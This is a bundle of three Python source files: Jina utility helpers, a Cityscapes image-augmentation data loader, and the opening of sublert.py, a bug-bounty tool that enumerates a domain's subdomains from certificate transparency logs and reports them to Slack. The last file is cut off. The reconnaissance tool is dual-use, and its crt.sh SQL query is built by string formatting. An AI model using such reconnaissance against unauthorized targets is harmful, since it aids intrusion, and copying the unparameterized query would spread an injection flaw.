return version_info + '\n' + env_info
def _use_uvloop():
from .importer import ImportExtensions
with ImportExtensions(
required=False,
help_text='Jina uses uvloop to manage events and sockets, '
'it often yields better performance than builtin asyncio',
):
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
if 'JINA_DISABLE_UVLOOP' not in os.environ:
_use_uvloop()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machine in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip():
"""
Return the public IP address of the gateway for connecting from other machine in the public network.
:return: Public IP address.
"""
import urllib.request
timeout = 0.2
results = []
def _get_ip(url):
try:
with urllib.request.urlopen(url, timeout=timeout) as fp:
results.append(fp.read().decode('utf8'))
except:
pass
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://ipinfo.io/ip',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using magic command `get_ipython` that only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside jupyter, an eventloop is already exist, can't be stopped, can't be killed.
Directly calling asyncio.run will fail, as This function cannot be called when another asyncio event loop
is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use AsyncClient/AsyncFlow instead of Client/Flow. If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
def slugify(value):
"""
Normalize string, converts to lowercase, removes non-alpha characters, and converts spaces to hyphens.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
@contextmanager
def change_cwd(path):
"""
Change the current working dir to ``path`` in a context and set it back to the original one when leaves the context.
Yields nothing
:param path: Target path.
:yields: nothing
"""
curdir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(curdir)
@contextmanager
def change_env(key, val):
"""
Change the environment of ``key`` to ``val`` in a context and set it back to the original one when leaves the context.
:param key: Old environment variable.
:param val: New environment variable.
:yields: nothing
"""
old_var = os.environ.get(key, None)
os.environ[key] = val
try:
yield
finally:
if old_var:
os.environ[key] = old_var
else:
os.environ.pop(key)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
r = r'^[/\w\-\_\.]+.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def _canonical_request_name(req_name: str):
"""Return the canonical name of a request
:param req_name: the original request name
:return: canonical form of the request
"""
if req_name.startswith('/'):
# new data request
return f'data://{req_name}'
else:
# legacy request type
return req_name.lower().replace('request', '')
def physical_size(directory: str) -> int:
"""Return the size of the given directory in bytes
:param directory: directory as :str:
:return: byte size of the given directory
"""
root_directory = Path(directory)
return sum(f.stat().st_size for f in root_directory.glob('**/*') if f.is_file())
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referrenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import Struct
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
if False:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
|
data.py
|
"""Contains classes for loading and augmenting data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import division
import cv2
import abc
import numpy as np
import six
import multiprocessing
import logging
cityscapes_value_map = {0: 255, 1: 255, 2: 255, 3: 255, 4: 255, 5: 255, 6: 255,
7: 0, 8: 1, 9: 255, 10: 255, 11: 2, 12: 3, 13: 4,
14: 255, 15: 255, 16: 255, 17: 5, 18: 255, 19: 6, 20: 7,
21: 8, 22: 9, 23: 10, 24: 11, 25: 12, 26: 13, 27: 14,
28: 15, 29: 255, 30: 255, 31: 16, 32: 17, 33: 18}
class DataLoader(object):
"""Loads data from disk and applies augmentation."""
def __init__(self, uri_queue, augmentor, image_loader, target_loader):
"""Initializes a new instance of the DataLoader class.
Args:
uri_queue: A queue that contains the data uris.
augmentor: An instance of `Augmentor`.
image_loader: An instance of `Loader` for loading the image.
target_loader: An instance of `Loader` for loading the labels.
"""
self._uri_queue = uri_queue
self._augmentor = augmentor
self._image_loader = image_loader
self._target_loader = target_loader
def get_pair(self):
"""Loads a new image annotation pair.
Returns:
A tuple consisting of the image and its annotation.
"""
image_file, target_file = self._uri_queue.get()
image = self._image_loader.load(image_file)
target = self._target_loader.load(target_file)
if self._augmentor is not None:
image, target = self._augmentor.augment(image, target)
return image, target
class BatchLoader(object):
"""Loads batches of data and puts them into a queue."""
def __init__(self, data_loader, queue, batch_size, num_classes):
"""Initializes a new instance of the BatchLoader class.
Args:
data_loader: The underlying data loader.
queue: The queue to push examples into.
batch_size: The batch size.
"""
self._data_loader = data_loader
self._queue = queue
self._batch_size = batch_size
self._num_classes = num_classes
self.start_loading()
def start_loading(self):
"""Starts loading images in an infinite loop."""
# Choose a new numpy random seed. Otherwise all processes use the same
# seed.
np.random.seed()
while True:
images, targets = self.load_batch()
self._queue.put((images, targets))
def load_batch(self):
"""Loads a single batch of images.
Returns:
A tuple of `images` and `targets`.
"""
data = [self._data_loader.get_pair() for _ in range(self._batch_size)]
# Convert the image from H, W, C and BGR to C, H, W and RGB.
images = [self._convert_image(d[0]) for d in data]
targets = [self._convert_target(d[1]) for d in data]
images = np.stack(images, axis=0)
targets = np.stack(targets, axis=0)
return images, targets
def _convert_image(self, image):
"""Converts the image to the desired format."""
image = np.rollaxis(image[:, :, ::-1], 2)
image = np.nan_to_num(image)
return image
def _convert_target(self, target):
"""Converts the target to int32 and replaces void labels by -1.
Args:
target: The target image.
Returns:
The converted target image.
"""
target = target.astype("int32")
target[target == 255] = self._num_classes
flat_targets = target.flatten()
class_matrix = np.eye(self._num_classes + 1, dtype='float32')
# Select the one-hot row for each example.
selects = class_matrix[flat_targets]
# Get back a properly shaped tensor.
new_shape = target.shape + (self._num_classes + 1, )
new_target = np.reshape(selects, new_shape )
new_target = new_target[:, :, :self._num_classes]
new_target = new_target.transpose((2, 0, 1))
return new_target
class DataProvider(object):
"""Client class for loading data asynchronously."""
def __init__(self,
augmentor,
image_loader,
target_loader,
data_iterator,
batch_size,
num_classes,
threads=3,
prefetch_batches=10):
"""Initializes a new instance of the DataProvider class.
Args:
augmentor: A dataset augmentor.
image_loader: Loader for loading the images.
target_loader: Loader for loaing the targets.
data_iterator: Data sequence iterator.
batch_size: The batch size.
num_classes: The number of classes.
threads: The number of loader threads.
prefetch_batches: The number of batches to prefetch.
"""
# Create the queue for feeding the data uris.
uri_queue = multiprocessing.Queue(maxsize=threads * prefetch_batches)
# Fill the queue.
p = multiprocessing.Process(
target=data_iterator.fill_queue, args=(uri_queue, ))
p.daemon = True
p.start()
# Create the data loader.
loader = DataLoader(uri_queue, augmentor, image_loader, target_loader)
# Create the data queue.
self._queue = multiprocessing.Queue(maxsize=prefetch_batches)
# Launch the loader.
for _ in range(threads):
args = (loader, self._queue, batch_size, num_classes)
p = multiprocessing.Process(target=BatchLoader, args=args)
p.daemon = True
p.start()
self._data_iterator = data_iterator
self._batch_size = batch_size
def get_num_batches(self):
"""Returns the number of batches."""
return self._data_iterator.get_sequence_length() // self._batch_size
def reset(self):
"""Resets the data iterator.
This functionality is not supported in python.
"""
logging.warning("Resetting the data provider is not supported in "
"Python. Please consider using the C++ chianti library "
"for training.")
def next(self):
"""Returns the next batch.
Returns:
A tuple consisting of image and target.
"""
return self._queue.get()
@six.add_metaclass(abc.ABCMeta)
class LoaderBase(object):
"""Instances of this class load images from a given resource identifier."""
@abc.abstractmethod
def load(self, uri):
"""Loads an image from a given resource identifier.
Args:
uri: The resource identifier.
Returns:
An image as numpy array.
"""
class RGBLoader(LoaderBase):
"""Loads an RGB image from the local disk."""
def load(self, uri):
"""Loads an image from a given resource identifier.
Args:
uri: The resource identifier.
Returns:
An image as numpy array.
"""
img = cv2.imread(uri, 1).astype('float32')
img = img / 255.0
return img
class ValueMapperLoader(LoaderBase):
"""Loads a gray scale image from disk and applies a value mapping."""
def __init__(self, intensity_map):
"""Initializes a new instance of the ValueMapperLoader class.
Args:
intensity_map: The intensity map.
"""
super(ValueMapperLoader, self).__init__()
self._intensity_map = intensity_map
self._map_func = np.vectorize(lambda px: self._intensity_map[px])
def load(self, uri):
"""Loads an image from a given resource identifier.
Args:
uri: The resource identifier.
Returns:
An image as numpy array.
"""
img = cv2.imread(uri, 0)
img = self._map_func(img)
return img
@six.add_metaclass(abc.ABCMeta)
class IteratorBase(object):
"""Allows to iterate over sequences in different orders."""
def __init__(self, sequence):
"""Initializes a new instance of the IteratorBase class.
Args:
sequence: The sequence to iterate over.
"""
self._mutex = multiprocessing.Lock()
self._sequence = sequence
if not self._sequence:
raise ValueError("Empty iteration sequence.")
def fill_queue(self, queue):
"""Fills the queue with the data from the iterator."""
while True:
queue.put(self.next())
def next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
self._mutex.acquire()
result = self._next()
self._mutex.release()
return result
def get_sequence_length(self):
"""Returns the sequence length."""
return len(self._sequence)
@abc.abstractmethod
def reset(self):
"""Resets the iterator for deterministic iteration."""
pass
@abc.abstractmethod
def _next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
class SequentialIterator(IteratorBase):
"""Iterates over the data in epochs."""
def __init__(self, sequence):
"""Initializes a new instance of the SequentialIterator class.
Args:
sequence: The sequence to iterate over.
"""
super(SequentialIterator, self).__init__(sequence)
self._index = 0
def reset(self):
"""Resets the iterator for deterministic iteration."""
self._index = 0
def _next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
if self._index == len(self._sequence):
self.reset()
result = self._sequence[self._index]
self._index += 1
return result
class RandomIterator(IteratorBase):
"""Iterates over the data randomly in epochs."""
def __init__(self, sequence):
"""Initializes a new instance of the RandomIterator class.
Args:
sequence: The sequence to iterate over.
"""
super(RandomIterator, self).__init__(sequence)
self._index = 0
self._order = np.arange(len(sequence))
self._shuffle()
def _shuffle(self):
"""Shuffles the current iteration order."""
np.random.shuffle(self._order)
self._index = 0
def reset(self):
"""Resets the iterator for deterministic iteration."""
self._order = np.arange(len(self._sequence))
self._index = 0
def _next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
if self._index == len(self._sequence):
self._shuffle()
result = self._sequence[self._order[self._index]]
self._index += 1
return result
class WeightedRandomIterator(IteratorBase):
"""Randomly samples elements according to a given probability."""
def __init__(self, sequence, weights):
"""Initializes a new instance of the WeightedRandomIterator class.
Args:
sequence: The sequence to iterate over.
weights: The weight of each element in the sequence.
"""
super(WeightedRandomIterator, self).__init__(sequence)
# Make sure that the weights define a probability distribution.
weights += np.min(weights)
weights /= np.sum(weights)
self._weights = weights
self._indices = np.arange(len(self._sequence))
def reset(self):
"""Resets the iterator for deterministic iteration."""
pass
def _next(self):
"""Returns the next element in the sequence.
Returns:
The next element in the sequence.
"""
index = np.random.choice(self._indices, p=self._weights)
return self._sequence[index]
@six.add_metaclass(abc.ABCMeta)
class AugmentorBase(object):
"""Augments the data."""
@abc.abstractmethod
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
pass
class SubsampleAugmentor(AugmentorBase):
"""Subsamples the image and the target."""
def __init__(self, factor):
"""Initializes a new instance of the SubsampleAugmentor class.
Args:
factor: The sampling factor.
"""
super(SubsampleAugmentor, self).__init__()
self._factor = factor
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
return self._scale_image(image), self._scale_target(target)
def _scale_image(self, image):
"""Downscales the image."""
size = image.shape[1] // self._factor, image.shape[0] // self._factor
return cv2.resize(image, size, interpolation=cv2.INTER_CUBIC)
def _scale_target(self, target):
"""Downscales the target.
This script is based on the following code:
https://github.com/VisualComputingInstitute/cityscapes-util/blob/master/
__init__.py
Copyright (c) Visual Computing Institute RWTH Aachen University
"""
fy, fx = self._factor, self._factor
H, W = target.shape
h, w = H // fy, W // fx
m = np.min(target)
M = np.max(target)
if m == M:
M = m + 1
assert -1 <= m, "Labels should not have values below -1"
# Count the number of occurences of the labels in each "fy x fx cell"
label_sums = np.zeros((h, w, M + 2))
mx, my = np.meshgrid(np.arange(w), np.arange(h))
for dy in range(fy):
for dx in range(fx):
label_sums[my, mx, target[dy::fy, dx::fx]] += 1
# "Don't know" don't count.
label_sums = label_sums[:, :, :-1]
# Use the highest-occurence label.
new_targets = np.argsort(label_sums, 2)[:, :, -1].astype("uint8")
# But turn "uncertain" cells into "don't know" label.
counts = label_sums[my, mx, new_targets]
hit_counts = np.sum(label_sums, 2) * 0.25
new_targets[counts <= hit_counts] = 255
return new_targets
class TranslationAugmentor(AugmentorBase):
"""Translates the image randomly."""
def __init__(self, offset=40):
"""Initializes a new instance of the TranslationAugmentor class.
Args:
offset: The offset by which the image is randomly translated.
p:
"""
self._offset = offset
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample an offset in each direction.
offsets = np.random.randint(-self._offset, self._offset + 1, (2, ))
# Extract the image and the label
image = self._translate_image(image, offsets)
target = self._translate_target(target, offsets)
return image, target
def _translate_image(self, image, offsets):
"""Translates the image and uses reflection padding.
Args:
image: The image to translate.
offsets: The offset in each direction.
Returns:
The translated image.
"""
# Extract the image region that is defined by the offset.
region = image[
max(-offsets[0], 0):image.shape[0] - max(0, offsets[0]),
max(-offsets[1], 0):image.shape[1] - max(0, offsets[1]),
:]
# Pad the image using reflection padding.
padding = (
(max(0, offsets[0]), max(0, -offsets[0])),
(max(0, offsets[1]), max(0, -offsets[1])),
(0, 0)
)
region = np.pad(region, padding, "reflect")
return region
def _translate_target(self, target, offsets):
"""Translates the image and uses constant -1 padding.
Args:
target: The target to translate.
offsets: The offset in each direction.
Returns:
The translated image.
"""
new_target = -1 * np.ones_like(target)
new_target[
max(0, offsets[0]):target.shape[0] + min(0, offsets[0]),
max(0, offsets[1]):target.shape[1] + min(0, offsets[1])] = target[
max(-offsets[0], 0):target.shape[0] - max(0, offsets[0]),
max(-offsets[1], 0):target.shape[1] - max(0, offsets[1])]
return new_target
class GammaAugmentor(AugmentorBase):
"""Performs random gamma augmentation."""
def __init__(self, gamma_range=0.1):
"""Initializes a new instance of the GammaAugmentor class.
Args:
gamma_range: The range from which to sample gamma.
"""
self._gamma_range = gamma_range
assert 0.0 <= self._gamma_range <= 0.5, "Invalid gamma parameter."
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample a gamma factor.
gamma = np.random.uniform(-self._gamma_range, self._gamma_range)
# Apply the non-linear transformation
gamma = np.log(
0.5 + 1 / np.sqrt(2) * gamma) / np.log(0.5 - 1 / np.sqrt(2) * gamma)
# Perform the gamma correction.
image **= gamma
return image, target
class CropAugmentor(AugmentorBase):
"""Randomly extracts crops from the image."""
def __init__(self, unused_size, unsued_num_classes):
"""Initializes a new instance of the CropAugmentor class."""
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
raise NotImplementedError("Crop augmentation is not available in "
"Python. Please install the chianti C++ "
"library.")
class RotationAugmentor(AugmentorBase):
"""Randomly rotates the image."""
def __init__(self, max_angel):
"""Initializes a new instance of the RotationAugmentor class.
Args:
max_angel: The maximum angel by which the image is rotated.
"""
self._max_angel = max_angel
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample the rotation factor.
factor = np.random.uniform(-self._max_angel, self._max_angel)
if factor < 0:
factor += 360.0
# Get the rotation matrix.
h, w = image.shape[:2]
m = cv2.getRotationMatrix2D((w / 2, h / 2), factor, 1)
image = cv2.warpAffine(image, m, (w, h))
target = cv2.warpAffine(
target, m, (w, h), flags=cv2.INTER_NEAREST,
borderMode=cv2.BORDER_CONSTANT, borderValue=255)
return image, target
class ZoomingAugmentor(AugmentorBase):
"""Randomly zooms into or out of the image."""
def __init__(self, max_factor):
"""Initializes a new instance of the ZoomingAugmentor class.
Args:
max_factor: The maximum angel by which the image is rotated.
"""
self._max_angel = max_factor
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
raise NotImplementedError("Zooming augmentation is only available in "
"the C++ Chianti library.")
class SaturationAugmentor(AugmentorBase):
"""Randomly alters the image saturation."""
def __init__(self, min_delta, max_delta):
"""Initializes a new instance of the SaturationAugmentor class.
Args:
min_delta: Minimum deviation in the color space.
max_delta: Maximum deviation in the color space.
"""
self._min_delta = min_delta
self._max_delta = max_delta
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample the color factor.
factor = np.random.uniform(self._min_delta, self._max_delta)
hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hsv_image[:, :, 1] *= factor
hsv_image[:, :, 1] = np.clip(hsv_image[:, :, 1], 0.0, 1.0)
image = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR)
return image, target
class HueAugmentor(AugmentorBase):
"""Randomly alters the image hue."""
def __init__(self, min_delta, max_delta):
"""Initializes a new instance of the HueAugmentor class.
Args:
min_delta: Minimum deviation in the color space.
max_delta: Maximum deviation in the color space.
"""
self._min_delta = min_delta
self._max_delta = max_delta
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
# Sample the color factor.
factor = np.random.uniform(self._min_delta, self._max_delta)
hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hsv_image[:, :, 0] += factor
# Make sure the values are in [-360, 360].
hsv_image[:, :, 0] += 360 * (hsv_image[:, :, 0] < 360)
hsv_image[:, :, 0] -= 360 * (hsv_image[:, :, 0] > 360)
image = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR)
return image, target
class CombinedAugmentor(AugmentorBase):
"""Combines multiple augmentors into once."""
def __init__(self, augmentors):
"""Initializes a new instance of the CombinedAugmentor class.
Args:
augmentors: A list of augmentors.
"""
self._augmentors = augmentors
def augment(self, image, target):
"""Augments the data.
Args:
image: The image.
target: The target image.
Returns:
A tuple of augmented image and target image.
"""
for augmentor in self._augmentors:
image, target = augmentor.augment(image, target)
return image, target
|
sublert.py
|
#!/usr/bin/env python
# coding: utf-8
# Announced and released during OWASP Seasides 2019 & NullCon.
# Huge shout out to the Indian bug bounty community for their hospitality.
import argparse
import dns.resolver
import sys
import requests
import json
import difflib
import os
import re
import psycopg2
from tld import get_fld
from tld.utils import update_tld_names
from termcolor import colored
import threading
is_py2 = sys.version[0] == "2" #checks if python version used == 2 in order to properly handle import of Queue module depending on the version used.
if is_py2:
import Queue as queue
else:
import queue as queue
import config as cfg
import time
from db.SLDB import *
version = "1.4.7"
requests.packages.urllib3.disable_warnings()
def banner():
print('''
_____ __ __ __
/ ___/__ __/ /_ / /__ _____/ /_
\__ \/ / / / __ \/ / _ \/ ___/ __/
___/ / /_/ / /_/ / / __/ / / /_
/____/\__,_/_.___/_/\___/_/ \__/
''')
print(colored(" Author: Yassine Aboukir (@yassineaboukir)", "red"))
print(colored(" Version: {}", "red").format(version))
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-u','--url',
dest = "target",
help = "Domain to monitor. E.g: yahoo.com",
required = False)
parser.add_argument('-d', '--delete',
dest = "remove_domain",
help = "Domain to remove from the monitored list. E.g: yahoo.com",
required = False)
parser.add_argument('-t', '--threads',
dest = "threads",
help = "Number of concurrent threads to use. Default: 20",
type = int,
default = 20)
parser.add_argument('-r', '--resolve',
dest = "resolve",
help = "Perform DNS resolution.",
required=False,
nargs='?',
const="True")
parser.add_argument('-l', '--logging',
dest = "logging",
help = "Enable Slack-based error logging.",
required=False,
nargs='?',
const="True")
parser.add_argument('-a', '--list',
dest = "listing",
help = "Listing all monitored domains.",
required = False,
nargs='?',
const="True")
parser.add_argument('-m', '--reset',
dest = "reset",
help = "Reset everything.",
nargs='?',
const="True")
return parser.parse_args()
def domain_sanity_check(domain): #Verify the domain name sanity
if domain:
try:
domain = get_fld(domain, fix_protocol = True)
return domain
except:
print(colored("[!] Incorrect domain format. Please follow this format: example.com, http(s)://example.com, www.example.com", "red"))
sys.exit(1)
else:
pass
def slack(data): #posting to Slack
webhook_url = cfg.slack['posting_webhook']
slack_data = {'text': data}
response = requests.post(
webhook_url,
data = json.dumps(slack_data),
headers = {'Content-Type': 'application/json'}
)
if response.status_code != 200:
error = "Request to slack returned an error {}, the response is:\n{}".format(response.status_code, response.text)
errorlog(error, enable_logging)
if cfg.slack['sleep_enabled']:
time.sleep(1)
def reset(do_reset): #clear the monitored list of domains and remove all locally stored files
if do_reset:
sldb.delete_all_domains()
print(colored("\n[!] Sublert was reset successfully. Please add new domains to monitor!", "red"))
sys.exit(1)
else: pass
def remove_domain(domain_to_delete): #remove a domain from the monitored list
new_list = []
if domain_to_delete:
if sldb.domain_exists(domain_to_delete):
sldb.delete_domain(domain_to_delete)
print(colored("\n[-] {} was successfully removed from the monitored list.".format(domain_to_delete), "green"))
else:
print(colored("\n[!] {} - Not found".format(domain_to_delete), "red"))
sys.exit(1)
def domains_listing(): #list all the monitored domains
global list_domains
if list_domains:
domains = sldb.get_all_domains()
if len(domains) > 0 :
print(colored("\n[*] Below is the list of monitored domain names:\n", "green"))
for domain in domains:
print(colored("{}".format(domain.replace("\n", "")), "yellow"))
else:
print(colored("\n[!] The domain monitoring list is currently empty\n", "red"))
sys.exit(1)
def errorlog(error, enable_logging): #log errors and post them to slack channel
if enable_logging:
print(colored("\n[!] We encountered a small issue, please check error logging slack channel.", "red"))
webhook_url = cfg.slack['errorlogging_webhook']
slack_data = {'text': '```' + error + '```'}
response = requests.post(
webhook_url,
data = json.dumps(slack_data),
headers = {'Content-Type': 'application/json'}
)
if response.status_code != 200:
error = "Request to slack returned an error {}, the response is:\n{}".format(response.status_code, response.text)
errorlog(error, enable_logging)
else: pass
class cert_database(object): #Connecting to crt.sh public API to retrieve subdomains
global enable_logging
def lookup(self, domain, wildcard = True):
try:
try: #connecting to crt.sh postgres database to retrieve subdomains.
unique_domains = set()
domain = domain.replace('%25.', '')
conn = psycopg2.connect("dbname={0} user={1} host={2}".format(cfg.crtsh['name'], cfg.crtsh['user'], cfg.crtsh['host']))
conn.autocommit = True
cursor = conn.cursor()
cursor.execute("SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%{}'));".format(domain))
for result in cursor.fetchall():
matches = re.findall(r"\'(.+?)\'", str(result))
for subdomain in matches:
try:
if get_fld("https://" + subdomain) == domain:
unique_domains.add(subdomain.lower())
except: pass
return sorted(unique_domains)
except:
error = "Unable to connect to the database. We will attempt to use the API instead."
errorlog(error, enable_logging)
except:
base_url = "https://crt.sh/?q={}&output=json"
if wildcard:
domain = "%25.{}".format(domain)
url = base_url.format(domain)
subdomains = set()
user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0'
req = requests.get(url, headers={'User-Agent': user_agent}, timeout=20, verify=False) #times out after 8 seconds waiting
if req.status_code == 200:
try:
content = req.content.decode('utf-8')
data = json.loads(content)
for subdomain in data:
subdomains.add(subdomain["name_value"].lower())
return sorted(subdomains)
except:
error = "Error retrieving information for {}.".format(domain.replace('%25.', ''))
errorlog(error, enable_logging)
def queuing(): #using the queue for multithreading purposes
global domain_to_monitor
global q1
global q2
q1 = queue.Queue(maxsize=0)
q2 = queue.Queue(maxsize=0)
if domain_to_monitor:
pass
elif len(sldb.get_all_domains()) == 0:
print(colored("[!] Please consider adding a list of domains to monitor first.", "red"))
sys.exit(1)
else:
for line in sldb.get_all_domains():
if line != "":
q1.put(line.replace('\n', ''))
q2.put(line.replace('\n', ''))
else:
pass
def adding_new_domain(q1): #adds a new domain to the monitoring list
unique_list = []
global domain_to_monitor
